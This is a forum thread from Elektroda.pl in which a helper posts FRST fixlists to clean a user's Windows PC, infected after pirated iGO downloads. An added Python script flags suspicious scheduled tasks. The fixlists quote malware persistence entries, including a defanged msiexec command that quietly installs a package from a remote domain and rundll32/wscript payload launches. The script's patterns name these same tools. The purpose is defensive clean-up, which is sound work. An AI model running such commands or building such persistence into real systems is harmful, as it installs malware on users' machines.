Elektroda.pl

Long page loading times, slow computer

szymon189 27 Oct 2018 22:11 147 5
  • #2 27 Oct 2018 22:17
    Kolobos
    Computer specialist

    Uninstall AVG and check again.

    Fixlist.txt:
    Task: {57087595-5758-41A9-9318-772D711E74F7} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe [2018-09-19] (IObit)
    Task: {7E60BDDC-10A4-4114-BCB0-35C1BB3039B6} - System32\Tasks\Driver Booster SkipUAC (Szymon) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe [2018-09-20] (IObit)
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [Polar FlowSync] => [X]
    GroupPolicy: Ograniczenia ? <==== UWAGA

    It won't help with anything and won't really change anything.

    0
  • #4 03 Nov 2018 13:13
    Kolobos
    Computer specialist

    Probably? You probably couldn't have infected it any worse. You'd better not download anything else from the internet...

    I'm guessing one of these files is responsible:
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183391 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar.rar
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183390 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar(1).rar
    2018-11-03 12:23 - 2018-11-03 12:24 - 287094091 _____ C:\Users\Szymon\Downloads\iGO World 9.18.27.736653 - 19.jun.2018(1).rar
    The script will remove all three.

    Uninstall:
    DiskWMpower version 1.0
    SafeFinder
    YoutubeAdBlock

    Use AdwCleaner, options Scan/Szukaj and Clean/Usun: http://www.bleepingcomputer.com/download/adwcleaner/

    Run this Fixlist.txt with FRST:
    CloseProcesses:
    ContextMenuHandlers6: [Fast Explorer] -> {693BE9C0-BEC3-11D2-B4C1-C33BBD3AD64B} => -> Brak pliku
    Task: {1CA06697-283F-48E2-B822-8B0C58B57402} - System32\Tasks\lKLHkisATsnNjPT2 => rundll32 "C:\Program Files (x86)\VXIXCZnnU\zBWBPR.dll",#1.)
    Task: {3BE2D2CA-3353-46F0-8156-AB8F3BCD901C} - System32\Tasks\dPIEEDxCPUYvKtIKKhr2 => rundll32 "C:\Program Files (x86)\VBeLgSlZrsYKC\jeKqsmQ.dll",#1
    Task: {462A46B0-4AD9-4BC6-8E53-C10A04B00CC7} - System32\Tasks\JbRbPldPaXVcEk => rundll32 "C:\Program Files (x86)\JEkILdsaHvdU2\UzbBUWBBEPfRj.dll",#1
    Task: {58DBC077-51DB-421B-8435-357A6566CF33} - System32\Tasks\EZDWuPrvwhnlY2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\ZJlwACxPIpGmpNVB\RaeAmFf.wsf"
    Task: {5BB6CB27-82FC-4ED5-975B-C6C7ACFC466C} - System32\Tasks\{2A28DE1B-4BA7-5483-4276-2981AEB77F44} => C:\WINDOWS\ETAiVfub.exe [2018-08-03] (Microsoft Corporation)
    C:\WINDOWS\ETAiVfub.exe
    Task: {685173AA-7DC4-43E4-93D6-6BD384EE8CFD} - System32\Tasks\cZAtztbWkvttEsiJa2 => rundll32 "C:\Program Files (x86)\YFseyhTTSweoDxcixvR\QwbnNlq.dll",#1
    Task: {AEBFCB8C-7A22-43BE-9695-F546B261A729} - System32\Tasks\23b30166-bf8f-4f94-b2b4-8244e0967f87 => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2018-11-01] ()
    Task: {B492C385-B5A3-4C85-AB38-2FC09234614E} - System32\Tasks\{72AE0148-77CB-7A83-AB92-67545E0A84E1} => "msiexec" -package hxxps://refreshnerer1510.info/E4KBsGH5rj3G.78a /q
    Hosts:
    () C:\Program Files (x86)\uuovhzhx2oa\VKI7BGCHU24LC06.exe
    () C:\Users\Szymon\AppData\Local\Temp\BIRTSPKFIX\up.exe
    () C:\Program Files\GURYNKX1YJ\GURYNKX1Y.exe
    () C:\Program Files (x86)\uuovhzhx2oa\Y0NRM.exe
    () C:\Program Files\4NHBPFOUDW\Y2YIHIED8.exe
    () C:\Program Files\YV7DZPTAYG\PRP07VSFM.exe
    () C:\Program Files\Reference Assemblies\879S47AWTJ9RZ8FSR\MXfmr#z3çj.exe
    () C:\ProgramData\PrefsSecure\Nettrans.exe
    () C:\Program Files\Reference Assemblies\879S47AWTJ9RZ8FSR\UpdateInstall.exe
    (TODO: <Company name>) C:\ProgramData\Kolnixo\Kolnixo.exe
    () C:\ProgramData\Logic Cramble\set.exe
    ( ) C:\Users\Szymon\AppData\Local\Temp\ZNiuMFEA0\ZNiuMFEA0.exe
    () C:\Users\Szymon\AppData\Local\Temp\is-E9BEQ.tmp\ZNiuMFEA0.tmp
    () C:\Program Files\AGN6751YQJ\AGN6751YQ.exe
    () C:\Program Files\OG8AQI9Z5G\OG8AQI9Z5.exe
    HKLM-x32\...\Run: [DiskPower] => C:\Program Files (x86)\DiskWMpower\DiskPower.exe [210432 2017-02-10] () <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_JAERD] => C:\Program Files (x86)\uuovhzhx2oa\VKI7BGCHU24LC06.exe [484352 2018-11-03] () <==== UWAGA
    HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Reference Assemblies\879S47AWTJ9RZ8FSR\ATuOlnRC59.exe [297472 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [U16JVW9CWJVR2K2] => C:\Program Files\GURYNKX1YJ\GURYNKX1Y.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [KCYEKCMDSHBRAL8] => C:\Program Files (x86)\uuovhzhx2oa\Y0NRM.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [JG7XISRL8PJ79OV] => C:\Program Files\4NHBPFOUDW\Y2YIHIED8.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [XGS005ZMNMDH5O9] => C:\Program Files\YV7DZPTAYG\PRP07VSFM.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [LAL6JEP19SQ3TBS] => C:\Program Files\OG8AQI9Z5G\OG8AQI9Z5.exe [1098752 2018-11-03] ()
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\...\Run: [JASGRNKPRZ17Q03] => C:\Program Files\AGN6751YQJ\AGN6751YQ.exe [1098752 2018-11-03] ()
    AppInit_DLLs: C:\ProgramData\Kolnixo\Zaamtanzap.dll => C:\ProgramData\Kolnixo\Zaamtanzap.dll [342528 2018-11-03] ()
    AppInit_DLLs-x32: C:\ProgramData\Kolnixo\Softdubsoft.dll => C:\ProgramData\Kolnixo\Softdubsoft.dll [460800 2018-11-03] ()
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    HKU\S-1-5-21-4216960334-647529631-3073891758-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...c-vSojgC2FFIkIWS0BqqoLfPSWzF14VPhHBoq9WwZgQ,,,,
    HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...c-vSojgC2FFIkIWS0BqqoLfPSWzF14VPhHBoq9WwZgQ,,,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4216960334-647529631-3073891758-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4216960334-647529631-3073891758-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-80-1708958382-1225314969-3040366088-2957102912-3332197768 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...3owiq6LI2ZQdC42GQBm4BOKss7bU1CYhLivA,,&q={searchTerms}
    BHO: YoutubeAdBlock -> {586E89A6-A5B5-4B36-9440-4C12FF9C74E4} -> C:\Program Files (x86)\gHUgOvOJlIE\t4HfVd4.dll [2018-11-03] ()
    BHO-x32: YoutubeAdBlock -> {586E89A6-A5B5-4B36-9440-4C12FF9C74E4} -> C:\Program Files (x86)\gHUgOvOJlIE\keWq0TP.dll [2018-11-03] ()
    FF user.js: detected! => C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\user.js [2017-06-30]
    FF Homepage: Mozilla\Firefox\Profiles\bsrefnmh.default -> file:///C:/ProgramData/Kolnixos/ff.HP
    FF NewTab: Mozilla\Firefox\Profiles\bsrefnmh.default -> file:///C:/ProgramData/Kolnixos/ff.NT
    FF Extension: (System Table) - C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\383882@modext.tech.xpi [2018-08-22]
    C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\383882@modext.tech.xpi
    FF Extension: (Brak nazwy) - C:\Program Files\Mozilla Firefox\browser\features\{32082DD9-C536-43AA-AF48-D266049C6FDA}.xpi [2018-11-03] [Brak podpisu cyfrowego]
    C:\Program Files\Mozilla Firefox\browser\features\{32082DD9-C536-43AA-AF48-D266049C6FDA}.xpi
    S2 AlphateamService; C:\ProgramData\AlphateamService\AlphateamService.exe [3712232 2018-11-03] ()
    R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-11-03] () <==== UWAGA
    R2 Kolnixo; C:\ProgramData\\Kolnixo\\Kolnixo.exe [1995264 2018-11-03] (TODO: <Company name>) [Brak podpisu cyfrowego]
    R2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [43520 2018-11-03] () <==== UWAGA
    2018-11-03 12:31 - 2018-11-03 12:31 - 000000000 ____D C:\Program Files\OG8AQI9Z5G
    2018-11-03 12:31 - 2018-11-03 12:31 - 000000000 ____D C:\Program Files\AGN6751YQJ
    2018-11-03 12:30 - 2018-11-03 12:31 - 000015614 _____ C:\WINDOWS\SysWOW64\findit.xml
    2018-11-03 12:30 - 2018-11-03 12:31 - 000000000 ____D C:\Users\Szymon\AppData\Local\WhiteClick
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003212 _____ C:\WINDOWS\System32\Tasks\JbRbPldPaXVcEk
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003044 _____ C:\WINDOWS\System32\Tasks\EZDWuPrvwhnlY2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003034 _____ C:\WINDOWS\System32\Tasks\cZAtztbWkvttEsiJa2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003026 _____ C:\WINDOWS\System32\Tasks\dPIEEDxCPUYvKtIKKhr2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000003008 _____ C:\WINDOWS\System32\Tasks\lKLHkisATsnNjPT2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Users\Szymon\AppData\Roaming\WidModule
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\ProgramData\ZJlwACxPIpGmpNVB
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\ProgramData\Logic Cramble
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\ProgramData\Kolnixos
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\YFseyhTTSweoDxcixvR
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\VXIXCZnnU
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\VBeLgSlZrsYKC
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\JEkILdsaHvdU2
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\gnogaTRWAYUn
    2018-11-03 12:30 - 2018-11-03 12:30 - 000000000 ____D C:\Program Files (x86)\gHUgOvOJlIE
    2018-11-03 12:29 - 2018-11-03 12:40 - 000000000 ____D C:\ProgramData\Kolnixo
    2018-11-03 12:29 - 2018-11-03 12:39 - 000000000 ____D C:\Program Files (x86)\uuovhzhx2oa
    2018-11-03 12:29 - 2018-11-03 12:29 - 007800320 _____ C:\Users\Szymon\AppData\Local\agent.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 002020197 _____ C:\Users\Szymon\AppData\Local\Lamity.tst
    2018-11-03 12:29 - 2018-11-03 12:29 - 000126464 _____ C:\Users\Szymon\AppData\Local\noah.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 000070896 _____ C:\Users\Szymon\AppData\Local\Config.xml
    2018-11-03 12:29 - 2018-11-03 12:29 - 000018432 _____ C:\Users\Szymon\AppData\Local\Main.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 000005568 _____ C:\Users\Szymon\AppData\Local\md.xml
    2018-11-03 12:29 - 2018-11-03 12:29 - 000003478 _____ C:\WINDOWS\System32\Tasks\23b30166-bf8f-4f94-b2b4-8244e0967f87
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\PrefsSecure
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\AlphateamService
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\8607927d-7035-0
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\ProgramData\8607927d-6fc7-1
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files\YV7DZPTAYG
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files\GURYNKX1YJ
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files\4NHBPFOUDW
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files (x86)\foldershare
    2018-11-03 12:29 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files (x86)\DiskWMpower
    2018-11-03 12:29 - 2018-11-03 12:27 - 001995264 _____ (TODO: <Company name>) C:\Users\Szymon\AppData\Local\Lamity.exe
    2018-11-03 12:28 - 2018-11-03 12:30 - 000000000 ____D C:\Users\Szymon\AppData\Roaming\One System Care
    2018-11-03 12:28 - 2018-11-03 12:29 - 000000000 ____D C:\Program Files (x86)\OneSystemCare
    2018-11-03 12:28 - 2018-11-03 12:28 - 000278509 _____ C:\Users\Szymon\AppData\Local\Biofresh.bin
    2018-11-03 12:28 - 2018-11-03 12:28 - 000003748 _____ C:\WINDOWS\System32\Tasks\{72AE0148-77CB-7A83-AB92-67545E0A84E1}
    2018-11-03 12:28 - 2018-11-03 12:28 - 000003582 _____ C:\WINDOWS\System32\Tasks\{2A28DE1B-4BA7-5483-4276-2981AEB77F44}
    2018-11-03 12:28 - 2018-11-03 12:28 - 000001052 _____ C:\Users\Szymon\Desktop\Adult Dating.lnk
    2018-11-03 12:28 - 2018-11-03 12:28 - 000001044 _____ C:\Users\Szymon\Desktop\Win iPhone X.lnk
    2018-11-03 12:28 - 2018-11-03 12:28 - 000001020 _____ C:\Users\Szymon\Desktop\Launch One System Care.lnk
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000003 _____ C:\Users\Szymon\AppData\Local\wbem.ini
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000000 ____D C:\ProgramData\817025a2-75a1-46fb-b7cb-4e88ac947d5a
    2018-11-03 12:28 - 2018-08-03 08:32 - 000060416 ____N (Microsoft Corporation) C:\WINDOWS\ETAiVfub.exe
    2018-11-03 12:28 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Program Files (x86)\aOpXUSd.exe
    2018-11-03 12:27 - 2018-11-03 12:31 - 000722944 _____ C:\Users\Szymon\AppData\Local\sham.db
    2018-11-03 12:27 - 2018-11-03 12:28 - 000017664 _____ C:\Users\Szymon\AppData\Local\InstallationConfiguration.xml
    2018-11-03 12:27 - 2018-11-03 12:27 - 000140800 _____ C:\Users\Szymon\AppData\Local\installer.dat
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183391 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar.rar
    2018-11-03 12:25 - 2018-11-03 12:26 - 003183390 _____ C:\Users\Szymon\Downloads\Download_iGO_World_data_zip_rar(1).rar
    2018-11-03 12:23 - 2018-11-03 12:24 - 287094091 _____ C:\Users\Szymon\Downloads\iGO World 9.18.27.736653 - 19.jun.2018(1).rar
    2018-11-03 12:28 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Program Files (x86)\aOpXUSd.exe
    2018-11-03 12:28 - 2018-08-03 08:32 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\HAEOAByA.exe
    2018-11-03 12:29 - 2018-11-03 12:29 - 007800320 _____ () C:\Users\Szymon\AppData\Local\agent.dat
    2018-11-03 12:28 - 2018-11-03 12:28 - 000278509 _____ () C:\Users\Szymon\AppData\Local\Biofresh.bin
    2018-11-03 12:29 - 2018-11-03 12:29 - 000070896 _____ () C:\Users\Szymon\AppData\Local\Config.xml
    2018-06-10 11:32 - 2018-06-10 11:32 - 000003584 _____ () C:\Users\Szymon\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2018-11-03 12:27 - 2018-11-03 12:28 - 000017664 _____ () C:\Users\Szymon\AppData\Local\InstallationConfiguration.xml
    2018-11-03 12:27 - 2018-11-03 12:27 - 000140800 _____ () C:\Users\Szymon\AppData\Local\installer.dat
    2018-11-03 12:29 - 2018-11-03 12:27 - 001995264 _____ (TODO: <Company name>) C:\Users\Szymon\AppData\Local\Lamity.exe
    2018-11-03 12:29 - 2018-11-03 12:29 - 002020197 _____ () C:\Users\Szymon\AppData\Local\Lamity.tst
    2018-11-03 12:29 - 2018-11-03 12:29 - 000018432 _____ () C:\Users\Szymon\AppData\Local\Main.dat
    2018-11-03 12:29 - 2018-11-03 12:29 - 000005568 _____ () C:\Users\Szymon\AppData\Local\md.xml
    2018-11-03 12:29 - 2018-11-03 12:29 - 000126464 _____ () C:\Users\Szymon\AppData\Local\noah.dat
    2018-11-03 12:27 - 2018-11-03 12:31 - 000722944 _____ () C:\Users\Szymon\AppData\Local\sham.db
    2018-11-03 12:30 - 2018-11-03 12:30 - 000032038 _____ () C:\Users\Szymon\AppData\Local\uninstall_temp.ico
    2018-11-03 12:28 - 2018-11-03 12:28 - 000000003 _____ () C:\Users\Szymon\AppData\Local\wbem.ini
    C:\Program Files (x86)\DiskWMpower\DiskPower.exe
    C:\Program Files (x86)\uuovhzhx2oa\VKI7BGCHU24LC06.exe
    EmptyTemp:

    Run a full scan with Mbam and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    and http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Finally, post new FRST logs from a scan.

    0
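
Added example, not part of the original post or of FRST: a small triage pass over `Task:` lines like the ones in the fixlists above, showing which persistence traits separate the scheduled tasks being removed from an ordinary vendor task. The function names `triage` and `report` and the three rule names are hypothetical, and the rules are heuristics assumed for this illustration.

```python
import re

# Task: lines copied from the fixlists in this thread; the URL is defanged (hxxps) as posted.
SAMPLE = r'''
Task: {57087595-5758-41A9-9318-772D711E74F7} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe [2018-09-19] (IObit)
Task: {462A46B0-4AD9-4BC6-8E53-C10A04B00CC7} - System32\Tasks\JbRbPldPaXVcEk => rundll32 "C:\Program Files (x86)\JEkILdsaHvdU2\UzbBUWBBEPfRj.dll",#1
Task: {58DBC077-51DB-421B-8435-357A6566CF33} - System32\Tasks\EZDWuPrvwhnlY2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\ZJlwACxPIpGmpNVB\RaeAmFf.wsf"
Task: {B492C385-B5A3-4C85-AB38-2FC09234614E} - System32\Tasks\{72AE0148-77CB-7A83-AB92-67545E0A84E1} => "msiexec" -package hxxps://refreshnerer1510.info/E4KBsGH5rj3G.78a /q
'''

# FRST scheduled-task line: Task: {GUID} - System32\Tasks\<name> => <action>
TASK_RE = re.compile(
    r'^Task: \{[0-9A-Fa-f-]{36}\} - System32\\Tasks\\(?P<name>.+?) => (?P<action>.+)$')

# Triage heuristics: assumptions of this example, not FRST's own detection logic.
RULES = [
    # Task action runs a DLL or script through a built-in Windows host binary.
    ("lolbin-host", re.compile(r'\b(?:rundll32|wscript|cscript|mshta|regsvr32)(?:\.exe)?\b', re.I)),
    # Payload lives in a location a standard user can write to.
    ("user-writable-path", re.compile(r'\\(?:ProgramData|AppData)\\', re.I)),
    # msiexec pointed at a package URL instead of a local .msi file.
    ("remote-msi", re.compile(r'msiexec.*(?:hxxps?|https?)://', re.I)),
]

def triage(line):
    """Return (task_name, [matched rule names]) or None for non-Task lines."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    action = m.group("action")
    return m.group("name"), [name for name, rx in RULES if rx.search(action)]

def report(text):
    """Map every task name found in an FRST log excerpt to the rules it trips."""
    return dict(filter(None, map(triage, text.splitlines())))

if __name__ == "__main__":
    for task, reasons in report(SAMPLE).items():
        print(f"{'REVIEW' if reasons else 'ok':6}  {task}  {', '.join(reasons)}")
```

A task that trips no rule is not thereby clean; the rules only rank which entries to look at first.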
  • #6 03 Nov 2018 15:24
    Kolobos
    Computer specialist

    New Fixlist.txt for FRST:
    C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\{ed5a5d58-4e89-4ade-903c-34f4b64265cd}.xpi
    FF Extension: (Tpay.com) - C:\Users\Szymon\AppData\Roaming\Mozilla\Firefox\Profiles\bsrefnmh.default\Extensions\{ed5a5d58-4e89-4ade-903c-34f4b64265cd}.xpi [2017-09-
    HKLM\SYSTEM\CurrentControlSet\Services\458323237A0D3114 <==== UWAGA (Rootkit!)
    2018-11-03 13:30 - 2018-11-03 13:44 - 000000008 __RSH C:\Users\Szymon\ntuser.pol
    2018-11-03 13:25 - 2018-11-03 13:27 - 000000000 ____D C:\AdwCleaner

    After running it, delete the C:\FRST directory and that's all.

    0